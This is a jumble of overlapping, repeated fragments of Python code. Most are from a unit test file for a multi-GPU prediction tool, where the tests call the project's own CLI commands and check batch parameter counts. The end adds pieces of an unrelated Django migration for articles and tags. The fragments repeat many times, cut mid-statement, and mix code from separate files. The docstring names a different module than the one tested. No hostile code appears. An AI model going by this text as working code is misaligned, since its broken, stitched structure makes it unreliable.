"os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH,",
"with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd",
"--verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu",
"= \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu",
"def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def",
"cluster.multi_gpu as multi_gpu import functools from absl.testing import absltest import numpy as np",
") def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH,",
"dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with",
"verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" %",
"multi_gpu import functools from absl.testing import absltest import numpy as np import os",
"test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self):",
"--help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params,",
"handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu",
"import numpy as np import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH",
"import cluster.multi_gpu as multi_gpu import functools from absl.testing import absltest import numpy as",
"from absl.testing import absltest import numpy as np import os DEMO_PATH = \"../demo/markerless_mouse1\"",
"test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, )",
"\"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self):",
"cmd = \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd)",
"CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False",
"self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True,",
"= \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def",
"as multi_gpu import functools from absl.testing import absltest import numpy as np import",
"= multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file))",
"numpy as np import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH =",
"\"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self):",
"self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH,",
"= \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self):",
"class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler",
"def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True,",
"batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler(",
"DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" %",
"os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, )",
"multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True",
"= handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler(",
"self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd =",
"10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params,",
"absl.testing import absltest import numpy as np import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH",
"n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\"",
"== 10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, )",
"self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False,",
"functools from absl.testing import absltest import numpy as np import os DEMO_PATH =",
"test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % (",
"test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ =",
"--dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s",
"--test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) if __name__ == \"__main__\":",
"def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH,",
"%s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) if __name__ ==",
"CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\"",
"test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ =",
"<reponame>diegoaldarondo/dannce \"\"\"Tests for locomotion.tasks.two_tap.\"\"\" import cluster.multi_gpu as multi_gpu import functools from absl.testing import",
"= \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def",
"CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) ==",
"handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu()",
"_ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH,",
"( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True --verbose=False",
"absltest import numpy as np import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\"",
"handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH,",
"CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def",
"= \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) if",
"batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler",
"\"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\")",
"== 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True",
"as np import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\"",
"def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH,",
"handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu()",
"test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, )",
"verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def",
"test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH,",
"dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler",
"test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self):",
"--test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd =",
"def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _",
"np import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class",
") batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError):",
"_ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler =",
"import functools from absl.testing import absltest import numpy as np import os DEMO_PATH",
"= multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self): cmd = \"dannce-predict-multi-gpu %s",
"os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100,",
"% ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True",
"\"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) if __name__",
"import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase):",
"test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH,",
"n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10)",
"--verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) if __name__ == \"__main__\": absltest.main()",
"%s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd",
"\"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu",
"multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params)",
"def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _",
"for locomotion.tasks.two_tap.\"\"\" import cluster.multi_gpu as multi_gpu import functools from absl.testing import absltest import",
") os.system(cmd) def test_com_predict_multi_gpu_cli(self): cmd = \"com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % (",
"test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True ) def test_dannce_predict_multi_gpu_cli(self):"
] |
[
"import datetime from twick.tweet import Tweet import twick.settings as settings class Response(object): def",
"twick.settings as settings class Response(object): def __init__(self, raw): self.raw = raw self.tweets =",
"__init__(self, raw): self.raw = raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"]) self.timestamp",
"from twick.tweet import Tweet import twick.settings as settings class Response(object): def __init__(self, raw):",
"datetime import datetime from twick.tweet import Tweet import twick.settings as settings class Response(object):",
"Response(object): def __init__(self, raw): self.raw = raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata =",
"Tweet import twick.settings as settings class Response(object): def __init__(self, raw): self.raw = raw",
"self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"]) self.timestamp = datetime.now() def to_row(self): return",
"as settings class Response(object): def __init__(self, raw): self.raw = raw self.tweets = list(map(Tweet,",
"datetime from twick.tweet import Tweet import twick.settings as settings class Response(object): def __init__(self,",
"raw): self.raw = raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"]) self.timestamp =",
"twick.tweet import Tweet import twick.settings as settings class Response(object): def __init__(self, raw): self.raw",
"self.raw = raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"]) self.timestamp = datetime.now()",
"= raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"]) self.timestamp = datetime.now() def",
"import twick.settings as settings class Response(object): def __init__(self, raw): self.raw = raw self.tweets",
"= list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"]) self.timestamp = datetime.now() def to_row(self): return self.metadata",
"from datetime import datetime from twick.tweet import Tweet import twick.settings as settings class",
"raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"]) self.timestamp = datetime.now() def to_row(self):",
"def __init__(self, raw): self.raw = raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata = dict(raw[\"search_metadata\"])",
"import Tweet import twick.settings as settings class Response(object): def __init__(self, raw): self.raw =",
"class Response(object): def __init__(self, raw): self.raw = raw self.tweets = list(map(Tweet, raw[\"statuses\"])) self.metadata",
"settings class Response(object): def __init__(self, raw): self.raw = raw self.tweets = list(map(Tweet, raw[\"statuses\"]))"
] |
[
"import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'),",
"), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether( name='readingstats', unique_together={('article', 'user')}, ), ]",
"to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether( name='readingstats', unique_together={('article', 'user')}, ),",
"2.1 on 2019-05-15 12:47 from django.conf import settings from django.db import migrations, models",
"= [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'),",
"name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article',",
"to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether( name='readingstats', unique_together={('article', 'user')},",
"= [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats',",
"migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,",
"from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration):",
"2019-05-15 12:47 from django.conf import settings from django.db import migrations, models import django.db.models.deletion",
"True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations = [",
"migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ),",
"('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),",
"), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ),",
"import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [",
"initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations",
"django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial",
"'0001_initial'), ('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ),",
"dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations = [ migrations.AddField(",
"] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article',",
"model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article',",
"name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author',",
"operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,",
"to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL,",
"field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,",
"class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'),",
"name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by',",
"name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether( name='readingstats',",
"('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField(",
"model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle',",
"migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ),",
"model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether(",
"migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField(",
"# Generated by Django 2.1 on 2019-05-15 12:47 from django.conf import settings from",
"django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies =",
"django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles',",
"12:47 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class",
"[ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ),",
"field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,",
"= True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations =",
"[ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user',",
"to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),",
"Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ]",
"model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField(",
"import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial =",
